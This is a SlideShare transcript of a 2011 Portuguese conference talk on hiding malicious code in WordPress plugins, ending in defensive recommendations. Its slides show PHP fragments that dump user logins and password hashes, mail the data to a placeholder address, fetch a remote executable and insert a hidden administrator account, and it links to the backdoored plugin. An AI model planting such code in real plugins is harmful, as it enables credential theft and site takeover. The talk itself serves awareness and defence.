0
AgendaO que são CMS?MotivaçãoProva de conceito. Happy hour...ImpactosConclusões
O que é um CMS (Content Management System)?São sistemas criados para gerenciar e administrar oconteúdo de sites. Ex: Wordp...
ConsideraçõesO que não esperar desta apresentação.1 – Discussões sobre o que é exploit ou não.Segundo o EC-Council exploit...
Motivação
Motivação – e o Kico???OK mas e o Kico??
Motivação
Motivação
Prova de conceito. Security as a happy hour...Dúvidas para a prova de conceito1 – Os plugins e temas submetidos são realme...
Prova de conceito. Security as a happy hour...1 – Os plugins e temas submetidos são realmenteanalisados?Criado uma versão ...
Prova de conceito. Security as a happy hour...1 – Os plugins e temas submetidos são realmenteanalisados?
Prova de conceito. Security as a happy hour...2 – Os plugins de “segurança” são eficientes?Alguns plugins testados:Exploit...
Prova de conceito. Security as a happy hour...3 – O que é possível fazer com um plugin.Funções utilizadas:Querys na base d...
Prova de conceito. Security as a happy hour...3 – O que é possível fazer com um plugin.Identificar o diretório de upload d...
Prova de conceito. Security as a happy hour...3 – O que é possível fazer com um plugin.Coletando informações da BD$results...
Prova de conceito. Security as a happy hour...3 – O que é possível fazer com um plugin.Garantindo o connection Back :D.......
Prova de conceito. Security as a happy hour...3 – O que é possível fazer com um plugin.Garantindo o acesso Administrativo$...
Prova de conceito. Security as a happy hour...3 – O que é possível fazer com um plugin.   Live demo – Bonus Track!!!
Prova de conceito. Security as a happy hour...TODAS AS INFORMAÇÕES, TEORIAS E DEMONSTRAÇÕES     APRESENTADOS TEM COMO OBJE...
Prova de conceito. Security as a happy hour...                              Entenderam.....
Prova de conceito. Security as a happy hour...                       Seria possível pegar uma
ConclusõesA principal falha é de processo por conta do wordpress enão nos plugins.A função wpdb permite uma infinidade de ...
ConclusõesRecomendações como mudar os nomes das tabelas ou odiretório padrão de upload não eliminam o problema.Nas pastas ...
Próximos passosEntender o mecanismo de criptografia que aparenta terfalhas na função avalanche e salt.
Prova de conceito. Security as a happy hour...         Bonus Bonus Track!!!       Plugin disponível em:      http://migre....
Dúvidas?Thiago Bordinithiago (at) bordini (dot) netwww.staysafepodcast.com.br           Security as a happy hour!!!Agradec...
Upcoming SlideShare
Loading in...5
×

Vale Security Conference - 2011 - 6 - Thiago Bordini

393

Published on

Vale Security Conference - 2011
Sábado - 6ª Palestra
Palestrante : Thiago Bordini
Palestra: Exploit code injection in CMS Systems
Twitter (Thiago Bordini) : https://twitter.com/#!/tbordini
Vídeo da Palestra (You Tube) : http://www.youtube.com/watch?v=Ls3ccKGe_bs
Slide (SlideShare) : http://www.slideshare.net/valesecconf/bordini

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
393
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
9
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Vale Security Conference - 2011 - 6 - Thiago Bordini"

  1. 1. AgendaO que são CMS?MotivaçãoProva de conceito. Happy hour...ImpactosConclusões
  2. 2. O que é um CMS (Content Management System)?São sistemas criados para gerenciar e administrar oconteúdo de sites. Ex: Wordpress, Drupal, Moodle, Joomladentre outros.PluginsAgregam novas funcionalidades aos CMS tais comoenquetes, galerias de fotos, integração com redes sociais,etc.TemasPersonalizam a aparência dos sites criados através dosCMS. Permitem algumas customizações.
  3. 3. ConsideraçõesO que não esperar desta apresentação.1 – Discussões sobre o que é exploit ou não.Segundo o EC-Council exploit é: A defined way to breachthe security of an IT system through vulnerability.2 – Demonstrar vulnerabilidades apenas técnicas. SI vaimuito mais além disso.3 – Que eu seja dono da verdade
  4. 4. Motivação
  5. 5. Motivação – e o Kico???OK mas e o Kico??
  6. 6. Motivação
  7. 7. Motivação
  8. 8. Prova de conceito. Security as a happy hour...Dúvidas para a prova de conceito1 – Os plugins e temas submetidos são realmenteanalisados?2 – Os plugins de “segurança” são eficientes?3 – O que é possível fazer com um plugin.
  9. 9. Prova de conceito. Security as a happy hour...1 – Os plugins e temas submetidos são realmenteanalisados?Criado uma versão pt-br do plug-in no-copy de autoria deMohanjith http://mohanjith.com/wordpress com o códigomalicioso já injetado.Submetido ao repositório do Wordpress.com juntamentecom os outros milhares de plug-ins disponíveis no site.(Emdez/2010 – 12.533 plugins com 141.819.480 downloads.Qual foi o resultado???
  10. 10. Prova de conceito. Security as a happy hour...1 – Os plugins e temas submetidos são realmenteanalisados?
  11. 11. Prova de conceito. Security as a happy hour...2 – Os plugins de “segurança” são eficientes?Alguns plugins testados:Exploit-Scanner-1.0.5 (Identificou o encode_base64)Wp-security-scan 3.0.6 (Nada, apenas permissõesinadequadas)Mjp-security-plugin-1.0 (Nada, apenaspermissões inadequadas e usuários default)Qual foi o resultado???Nenhum detectou o código malicioso.
  12. 12. Prova de conceito. Security as a happy hour...3 – O que é possível fazer com um plugin.Funções utilizadas:Querys na base de dados.$wpdb->get_var($wpdb->prepare("SELECT * FROM $wpdb->users"));Identificar URL onde o blog foi instalado.get_bloginfo(wpurl);Redirecionar site para outro endereço.wp_remote_fopen(http://www.xyz.com/index.html);
  13. 13. Prova de conceito. Security as a happy hour...3 – O que é possível fazer com um plugin.Identificar o diretório de upload do blog - wp_upload_dir();PATH blog – $upload_dir[basedir];URL dos uploads - $upload_dir[baseurl];Criar pasta - wp_mkdir_p($target);Baixar arquivo remoto e efetuar o uploadwp_upload_bits(‘xy.exe, null, file_get_contents($name));$upload[url];
  14. 14. Prova de conceito. Security as a happy hour...3 – O que é possível fazer com um plugin.Coletando informações da BD$results=$wpdb->get_results("SELECT * FROM $wpdb->users") .... $mensagem .= "ID: ". $result->ID ."n"; $mensagem .= "user_login: ". $result->user_login ."n"; $mensagem .= "user_pass: ". $result->user_pass ."n"; ....
  15. 15. Prova de conceito. Security as a happy hour...3 – O que é possível fazer com um plugin.Garantindo o connection Back :D....$mensagem = "URL Site: ". $url ."n";$mensagem .= "Diretório criado em: ". $target_dir."n";$mensagem .= "Arquivo criado em: ". $target_file."n";....$headers .= "From: PoC <poc@localhost>n";$headers .= "Return-Path: PoC <poc@localhost>n";$envio = mail("poc@localhost", "PoC", $mensagem,$headers);....
  16. 16. Prova de conceito. Security as a happy hour...3 – O que é possível fazer com um plugin.Garantindo o acesso Administrativo$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`,`user_pass`, `user_nicename`, `user_email`,`user_url`, `user_registered`, `user_activation_key`,`user_status`, `display_name`) VALUES(1999,poc,$P$B0nhkbZo/ImMpG0I17f.jyAp5S9c3V.,poc,poc@xyz.local, , 2010-07-01 22:43:10, , 0, poc)");
  17. 17. Prova de conceito. Security as a happy hour...3 – O que é possível fazer com um plugin. Live demo – Bonus Track!!!
  18. 18. Prova de conceito. Security as a happy hour...TODAS AS INFORMAÇÕES, TEORIAS E DEMONSTRAÇÕES APRESENTADOS TEM COMO OBJETIVO ALERTAR A PLATÉIA.
  19. 19. Prova de conceito. Security as a happy hour... Entenderam.....
  20. 20. Prova de conceito. Security as a happy hour... Seria possível pegar uma
  21. 21. ConclusõesA principal falha é de processo por conta do wordpress enão nos plugins.A função wpdb permite uma infinidade de combinações dequerys SQL como por exemplo: $wpdb->query("DELETE FROM $wpdb->posts WHERE post_id <> ‘0");Como não existe uma garantia da integridade dos plugins etemplates, revise os códigos antes de instalar.Os plugins de segurança ajudam, mas não eliminam oproblema.
  22. 22. ConclusõesRecomendações como mudar os nomes das tabelas ou odiretório padrão de upload não eliminam o problema.Nas pastas de upload verifique as permissões aplicadas emarquivos e pastas.Manter o wordpress, plugins e temas atualizados éindispensável.Revise os códigos antes de instalar algo.Teste em ambiente independente.
  23. 23. Próximos passosEntender o mecanismo de criptografia que aparenta terfalhas na função avalanche e salt.
  24. 24. Prova de conceito. Security as a happy hour... Bonus Bonus Track!!! Plugin disponível em: http://migre.me/5B4S8 Usem por sua conta e risco. Sem suporte.
  25. 25. Dúvidas?Thiago Bordinithiago (at) bordini (dot) netwww.staysafepodcast.com.br Security as a happy hour!!!Agradecimentos:Crash / Gr1nch / DCLabs / Nelson Brito / Jordan BonaguraReferência:http://codex.wordpress.org/
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×